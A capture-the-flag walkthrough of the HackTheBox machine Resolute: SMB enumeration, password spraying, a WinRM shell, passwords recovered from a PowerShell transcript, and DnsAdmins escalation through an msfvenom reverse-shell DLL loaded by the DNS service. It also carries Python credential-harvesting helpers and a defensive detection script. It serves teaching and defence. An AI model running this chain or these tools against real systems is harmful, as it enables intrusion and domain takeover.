HackTheBox - Resolute | Walkthrough

Recon
nmap -A 10.10.10.169
enum4linux 10.10.10.169 > enum
grep "Account:" enum
You should see the domain's accounts. Read the Desc: field of each one: one account's description contains a password (Welcome123!), which is worth spraying against every user.
Make a user list from it. awk splits on any whitespace (tabs included), so the tab between the account name and the Name: field does not end up in the list the way it can with cut -d " ":
grep "Account:" enum | awk '{print $8}' > user_list
msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
options
set RHOSTS 10.10.10.169
set SMBPass 'Welcome123!'
set USER_FILE ~/HTB/Resolute/user_list
run
Only one user accepts that password: melanie. Spraying a single password across many accounts like this costs each account one failed attempt, so it stays clear of lockout thresholds.
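To make the recon step less fiddly, here is a small Python helper, added for this write-up (it is not from the original notes or from enum4linux itself), that parses enum4linux's Account: lines into a spray list, drops disabled accounts, and pulls password hints out of the Desc: field. The enum4linux sample inside it is constructed: the account svc_deploy and its description are made up; only melanie, ryan and the Welcome123! password come from this box.

```python
"""Turn enum4linux output into a spray list and pull password hints out of
account descriptions.

Added example for this walkthrough (not part of the original notes). The
enum4linux text below is constructed to match the tool's querydispinfo
layout; svc_deploy and its description are invented, Welcome123! is the
password the notes use.
"""
import re
import sys
from dataclasses import dataclass
from typing import List, Tuple

ACB_DISABLED = 0x0001  # SAMR account-control bit: account is disabled

# Constructed sample of enum4linux's "Users on <host>" section. The fields
# after "Account:" are tab-separated, which is why `cut -d " " -f8` can drag
# the "Name:" label along with the account name.
SAMPLE_ENUM = (
    " ==========================\n"
    "|    Users on 10.10.10.169    |\n"
    " ==========================\n"
    "index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator\tName: (null)\tDesc: Built-in account for administering the computer/domain\n"
    "index: 0x10b5 RID: 0x457 acb: 0x00000210 Account: svc_deploy\tName: Deploy Service\tDesc: Account created. Password set to Welcome123!\n"
    "index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie\tName: (null)\tDesc: (null)\n"
    "index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: ryan\tName: (null)\tDesc: (null)\n"
    "index: 0x10c4 RID: 0x1f5 acb: 0x00000215 Account: Guest\tName: (null)\tDesc: Built-in account for guest access to the computer/domain\n"
)

ACCOUNT_RE = re.compile(
    r"^index:\s+0x[0-9a-fA-F]+\s+RID:\s+(?P<rid>0x[0-9a-fA-F]+)\s+"
    r"acb:\s+(?P<acb>0x[0-9a-fA-F]+)\s+Account:\s+(?P<account>\S+)\s+"
    r"Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)

# "Password set to X", "pwd: X", "pass = X" ... inside a description field
PASSWORD_HINT_RE = re.compile(
    r"(?i)\b(?:pass(?:word|wd|phrase)?|pwd)\b\s*"
    r"(?:(?:is|set\s+to|reset\s+to|changed\s+to)\s*|[:=]\s*)?(?P<value>\S+)"
)


@dataclass
class Account:
    account: str
    rid: int
    acb: int
    name: str
    desc: str

    @property
    def disabled(self) -> bool:
        return bool(self.acb & ACB_DISABLED)


def parse_accounts(text: str) -> List[Account]:
    """Parse every 'index: ... Account: ...' line; other lines are ignored."""
    accounts = []
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line.strip())
        if m:
            accounts.append(Account(account=m["account"], rid=int(m["rid"], 16),
                                    acb=int(m["acb"], 16), name=m["name"], desc=m["desc"]))
    return accounts


def looks_like_password(value: str) -> bool:
    """Cheap filter so words like 'must' in 'password must be changed' are skipped."""
    return len(value) >= 6 and (any(c.isdigit() for c in value) or any(not c.isalnum() for c in value))


def password_candidates(accounts: List[Account]) -> List[Tuple[str, str]]:
    """(account, password) pairs found in description fields."""
    found = []
    for acc in accounts:
        for m in PASSWORD_HINT_RE.finditer(acc.desc):
            value = m["value"].rstrip(".,;:)")
            if looks_like_password(value):
                found.append((acc.account, value))
    return found


def spray_targets(accounts: List[Account]) -> List[str]:
    """Enabled accounts only: disabled ones just add noise to smb_login output."""
    return [a.account for a in accounts if not a.disabled]


if __name__ == "__main__":
    # Usage: python3 enum_users.py enum > user_list   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ENUM
    accts = parse_accounts(text)
    for acc, pw in password_candidates(accts):
        print(f"# password hint: {acc} -> {pw}", file=sys.stderr)
    print("\n".join(spray_targets(accts)))
```

Feed it the saved enum file and the password hints go to stderr while the user list goes to stdout, so the redirect produces a clean USER_FILE for smb_login.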
User
Now, let's use evil-winrm to see if we can get a shell. WinRM (TCP 5985) showed up in the nmap scan, so melanie's password is worth trying there:
cd ~/HTB/Resolute/
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm/
ruby evil-winrm.rb
-> It gives an error, we need some dependencies first
cat Gemfile
-> checking for dependencies
gem install winrm winrm-fs colorize stringio
ruby evil-winrm.rb
-> shows a help menu
ruby evil-winrm.rb -u melanie -p 'Welcome123!' -i 10.10.10.169
You should get a shell!
User 2
The evil-winrm shell starts in C:\Users\melanie\Documents, so the flag is one directory up:
cd ..
type Desktop\user.txt
Now, look for hidden directories on the system drive. dir -h is shorthand for Get-ChildItem -Hidden, and the PSTranscripts directory is hidden, so a plain dir would miss it:
cd C:\
dir -h
cd PSTranscripts
dir -h
cd 20191203
type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
The transcript records a command that was run with another user's password on the command line: ryan's.
Make a new file, creds, and save it there; it will come in handy later.
ruby evil-winrm.rb -u ryan -p Serv3rAdmin4cc123! -i 10.10.10.169
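Transcript files can be long, and this one is not the only place a password can hide. The following Python script, added here as an example (not part of the original walkthrough), scans a PowerShell transcript for the usual ways a password ends up on a command line: net use with a positional password, ConvertTo-SecureString -AsPlainText, -Password / /pass: parameters, and variables named like passwords. The embedded transcript is constructed in the transcription log layout; the share, the svc_backup account and every password in it are invented, not the contents of the real transcript on the box.

```python
"""Scan a PowerShell transcript for commands that carry credentials.

Added example for this walkthrough (not part of the original notes). The
transcript below is constructed in the layout PowerShell transcription
uses; the host backup01, the account svc_backup and all passwords are made
up and are not the values from the real transcript.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\backup01\backups /user:MEGABANK\ryan Backup#2019!"
**********************
Command start time: 20191203063502
**********************
PS>net use
PS>$secure = ConvertTo-SecureString 'Sup3rS3cret!' -AsPlainText -Force
PS>cmdkey /add:backup01 /user:svc_backup /pass:Wint3r2019
PS>Get-ChildItem X:
"""

# Username context on the same line: net use /user:, cmdkey /user:, -UserName
USER_RE = re.compile(r"(?i)(?:/user:|-UserName\s+)(?P<q>['\"]?)(?P<user>[^'\"\s]+)(?P=q)")
NET_USE_RE = re.compile(r"(?i)\bnet\s+use\b(?P<args>.*)")
SECURESTRING_RE = re.compile(
    r"(?i)ConvertTo-SecureString\s+(?:-String\s+)?(?P<q>['\"])(?P<secret>.*?)(?P=q).*-AsPlainText")
PASSWORD_PARAM_RE = re.compile(r"(?i)(?:-Password|/pass:|/p:)\s*(?P<q>['\"]?)(?P<secret>[^'\"\s]+)(?P=q)")
ASSIGN_RE = re.compile(r"(?i)\$(?P<name>\w*(?:pass|pwd|secret|token)\w*)\s*=\s*(?P<q>['\"])(?P<secret>.*?)(?P=q)")

SECRET_PATTERNS = [
    ("ConvertTo-SecureString", SECURESTRING_RE),
    ("password parameter", PASSWORD_PARAM_RE),
    ("variable assignment", ASSIGN_RE),
]


@dataclass
class Finding:
    line_no: int
    kind: str
    secret: str
    user: Optional[str]


def _net_use_passwords(args: str) -> List[str]:
    """net use [drive:] \\server\share [password | *] [/user:name] [/switch ...]
    Anything that is not the drive, the UNC path, a switch or '*' is a password."""
    passwords = []
    for tok in args.split():
        tok = tok.strip("\"'")
        if not tok or tok == "*" or tok.startswith(("/", "\\\\")) or re.fullmatch(r"[A-Za-z]:", tok):
            continue
        passwords.append(tok)
    return passwords


def harvest(transcript: str) -> List[Finding]:
    """One Finding per secret, with the username from the same line when there is one."""
    findings: List[Finding] = []
    for no, line in enumerate(transcript.splitlines(), 1):
        um = USER_RE.search(line)
        user = um["user"] if um else None
        nm = NET_USE_RE.search(line)
        if nm:
            findings += [Finding(no, "net use", pw, user) for pw in _net_use_passwords(nm["args"])]
        for kind, rx in SECRET_PATTERNS:
            findings += [Finding(no, kind, m["secret"], user) for m in rx.finditer(line)]
    return findings


if __name__ == "__main__":
    import sys
    # Usage: python3 transcript_creds.py PowerShell_transcript.*.txt  (falls back to the sample)
    text = (open(sys.argv[1], encoding="utf-8-sig", errors="replace").read()
            if len(sys.argv) > 1 else SAMPLE_TRANSCRIPT)
    for f in harvest(text):
        print(f"line {f.line_no}: {f.kind}: {f.secret!r} user={f.user}")
```

A bare "net use" (listing mappings) and a "*" password prompt produce no findings, so the output is only the lines worth copying into the creds file. Run it over every transcript in the PSTranscripts tree, not just the one named above.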
Administrator
whoami /all
I recommend reading my other blog post on this privilege escalation, which covers it in far more detail: https://abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
The output shows that ryan is a member of the DnsAdmins group.
Members of DnsAdmins can point the DNS server at an arbitrary "plugin" DLL (the ServerLevelPluginDll setting, written with dnscmd /config). The DNS Server service loads that DLL as SYSTEM when it starts, and on Resolute the DNS server is the domain controller itself, so a malicious DLL gives us SYSTEM on the DC. This is the "DNS admin DLL injection" technique that searching for the group name turns up: an abuse of a legitimate feature rather than a bug in DNS.
in another terminal tab,
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.155 LPORT=4444 --platform=windows -f dll > ~/HTB/Resolute/share/plugin.dll
cd /usr/share/doc/python3-impacket/examples
./smbserver.py -smb2support SHARE ~/HTB/Resolute/share/
The share name is what the UNC path in the next step refers to (SMB share names are case-insensitive, so SHARE and share both work). -smb2support lets a server with SMB1 disabled reach the share.
And in another tab, set up a netcat listener:
nc -nvlp 4444
Now, in the evil-winrm shell as ryan, point the DNS server at the DLL on our share and restart the service so it gets loaded (on this box ryan is allowed to stop and start the DNS service):
dnscmd.exe Resolute.megabank.local /config /serverlevelplugindll \\10.10.15.155\share\plugin.dll
sc.exe stop dns
sc.exe start dns
When the service starts it loads plugin.dll, and the netcat listener receives a shell running as NT AUTHORITY\SYSTEM, the account the DNS Server service runs under. The DNS service itself will not come up cleanly afterwards, because the DLL is not a real plugin; to put the configuration back, run the same dnscmd /config /serverlevelplugindll command with no path, which clears the value.
type C:\Users\Administrator\Desktop\root.txt
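From the defender's side this technique leaves a clear trail: a write to the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, a dnscmd.exe command line containing /serverlevelplugindll, and a DNS Server service restart right after. The Python below is an added detection example (not part of the original notes): it runs that logic over constructed events whose field names follow Sysmon event 13 (registry value set), Sysmon event 1 (process create) and System log event 7036 (service state change), and rates a UNC or non-System32 plugin path followed by a service start as critical. The events, including which account appears as the registry writer, are made up for the example.

```python
"""Flag ServerLevelPluginDll abuse in Windows telemetry.

Added example for this walkthrough (not part of the original notes). The
events are constructed; their fields follow Sysmon event 13 (RegistryEvent,
value set), Sysmon event 1 (process create) and System log event 7036
(Service Control Manager state change). The path and command line mirror
the dnscmd step above.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Registry value written by `dnscmd /config /serverlevelplugindll <path>`.
# dns.exe loads the DLL as SYSTEM the next time the DNS Server service starts.
PLUGIN_VALUE_SUFFIX = r"\services\dns\parameters\serverlevelplugindll"
TRUSTED_PLUGIN_DIR = "c:\\windows\\system32\\"
RESTART_WINDOW = timedelta(minutes=15)

SAMPLE_EVENTS: List[Dict] = [
    # benign: a different DNS parameter changed by the service itself
    {"time": "2019-12-03T06:32:40", "id": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\BootMethod",
     "Details": "DWORD (0x00000003)", "User": r"NT AUTHORITY\SYSTEM"},
    {"time": "2019-12-03T06:40:10", "id": 1, "User": r"MEGABANK\ryan",
     "Image": r"C:\Windows\System32\dnscmd.exe",
     "CommandLine": r"dnscmd.exe Resolute.megabank.local /config /serverlevelplugindll \\10.10.15.155\share\plugin.dll"},
    {"time": "2019-12-03T06:40:11", "id": 13, "EventType": "SetValue",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "Details": r"\\10.10.15.155\share\plugin.dll", "User": r"NT AUTHORITY\SYSTEM"},
    {"time": "2019-12-03T06:40:30", "id": 7036,
     "Message": "The DNS Server service entered the stopped state."},
    {"time": "2019-12-03T06:40:33", "id": 7036,
     "Message": "The DNS Server service entered the running state."},
]


@dataclass
class Alert:
    time: str
    rule: str
    severity: str
    detail: str


def plugin_path_is_suspicious(path: str) -> bool:
    """A legitimate plugin is a local DLL under System32; a UNC path or a
    user-writable location means the DNS service will load attacker code."""
    p = path.strip().strip('"').lower()
    return p.startswith("\\\\") or not p.startswith(TRUSTED_PLUGIN_DIR)


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def detect(events: List[Dict]) -> List[Alert]:
    alerts: List[Alert] = []
    dns_starts = [_ts(e) for e in events
                  if e.get("id") == 7036
                  and "DNS Server service entered the running state" in e.get("Message", "")]
    for e in events:
        if e.get("id") == 1 and "/serverlevelplugindll" in e.get("CommandLine", "").lower():
            alerts.append(Alert(e["time"], "dnscmd ServerLevelPluginDll configuration", "high",
                                f"{e.get('User')} ran: {e['CommandLine']}"))
        elif e.get("id") == 13 and e.get("TargetObject", "").lower().endswith(PLUGIN_VALUE_SUFFIX):
            path = e.get("Details", "")
            t = _ts(e)
            suspicious = plugin_path_is_suspicious(path)
            # A service start shortly after the write means the DLL has been loaded.
            restarted = any(t <= s <= t + RESTART_WINDOW for s in dns_starts)
            severity = ("critical" if suspicious and restarted
                        else "high" if suspicious or restarted else "medium")
            alerts.append(Alert(e["time"], "ServerLevelPluginDll registry value set", severity,
                                f"{path} (written by {e.get('User')}; DNS started afterwards: {restarted})"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity.upper()}] {a.time} {a.rule}: {a.detail}")
```

The BootMethod write is there to show that not every change under DNS\Parameters should alert; only the ServerLevelPluginDll value matters, and the severity climbs when the path is remote or outside System32 and the service is started while that value is set. The same two signals are what to hunt for retroactively after cleaning the value up.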